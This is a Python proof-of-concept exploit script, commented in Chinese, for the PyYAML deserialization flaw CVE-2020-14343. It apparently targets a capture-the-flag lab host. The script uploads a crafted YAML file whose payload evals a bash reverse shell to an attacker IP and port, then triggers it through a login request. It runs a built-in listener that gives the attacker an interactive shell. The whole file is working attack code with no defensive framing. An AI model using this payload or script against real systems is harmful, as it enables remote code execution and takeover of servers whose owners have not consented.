import requests import sys import threading import socket import time def exploit(target_url, attacker_ip, attacker_port): """ CVE-2020-14343 POC - PyYAML反序列化漏洞利用 """ # 构造恶意的YAML payload malicious_yaml = f"""host: {attacker_ip} info: Test user: Admin x: !!python/object/new:tuple - !!python/object/new:map - !!python/name:eval - ["__import__('os').system('bash -c \\\"bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1\\\"')"] """ # 准备上传的文件 files = { 'file': ('userConfig.yaml', malicious_yaml, 'application/x-yaml') } # 第一步:上传恶意YAML文件 print(f"[+] 上传恶意YAML文件到 {target_url}/upload") try: upload_response = requests.post( f"{target_url}/upload", files=files, allow_redirects=False ) print(f"[+] 上传响应: {upload_response.status_code}") except Exception as e: print(f"[-] 上传失败: {e}") return False # 第二步:触发反序列化漏洞 print(f"[+] 触发反序列化漏洞...") login_data = { 'username': 'Admin', 'password': '123456' } try: # 使用session保持cookie session = requests.Session() # 发送登录请求触发漏洞 login_response = session.post( f"{target_url}/login", data=login_data, headers={'Content-Type': 'application/x-www-form-urlencoded'} ) print(f"[+] 登录响应: {login_response.status_code}") if login_response.status_code == 200: print("[+] 漏洞利用成功!检查反弹shell连接...") return True else: print(f"[-] 可能利用失败,状态码: {login_response.status_code}") return False except Exception as e: print(f"[-] 触发漏洞失败: {e}") return False def start_listener(port): """ 启动简单的TCP监听器来接收反弹shell """ print(f"[*] 在端口 {port} 启动监听器...") try: # 创建socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind(('0.0.0.0', port)) s.listen(1) print(f"[+] 监听器已在 0.0.0.0:{port} 启动") conn, addr = s.accept() print(f"[+] 收到来自 {addr[0]}:{addr[1]} 的连接!") # 简单的交互 while True: try: # 接收数据 data = conn.recv(1024) if not data: break print(data.decode('utf-8', errors='ignore'), end='') # 发送命令 cmd = input() if cmd.strip().lower() == 'exit': break conn.send((cmd + '\n').encode()) except KeyboardInterrupt: print("\n[*] 用户中断") break except Exception as e: print(f"\n[-] 错误: {e}") break conn.close() s.close() except Exception as e: print(f"[-] 监听器错误: {e}") def main(): if len(sys.argv) != 4: print("用法: python cve-2020-14343_poc.py <目标URL> <攻击者IP> <攻击者端口>") print("示例: python cve-2020-14343_poc.py http://eci-2ze9naefg4wclmatagkc.cloudeci1.ichunqiu.com 192.168.1.100 4444") sys.exit(1) target_url = sys.argv[1] attacker_ip = sys.argv[2] attacker_port = int(sys.argv[3]) print(f"[*] CVE-2020-14343 PyYAML反序列化漏洞利用") print(f"[*] 目标: {target_url}") print(f"[*] 反弹shell到: {attacker_ip}:{attacker_port}") # 在新线程中启动监听器 listener_thread = threading.Thread(target=start_listener, args=(attacker_port,)) listener_thread.daemon = True listener_thread.start() # 等待监听器启动 time.sleep(2) # 执行漏洞利用 print("\n[*] 开始漏洞利用...") if exploit(target_url, attacker_ip, attacker_port): print("[+] 漏洞利用完成!") else: print("[-] 漏洞利用失败!") # 等待连接 try: print("\n[*] 等待反弹shell连接... (Ctrl+C 退出)") listener_thread.join() except KeyboardInterrupt: print("\n[*] 退出程序") if __name__ == "__main__": main()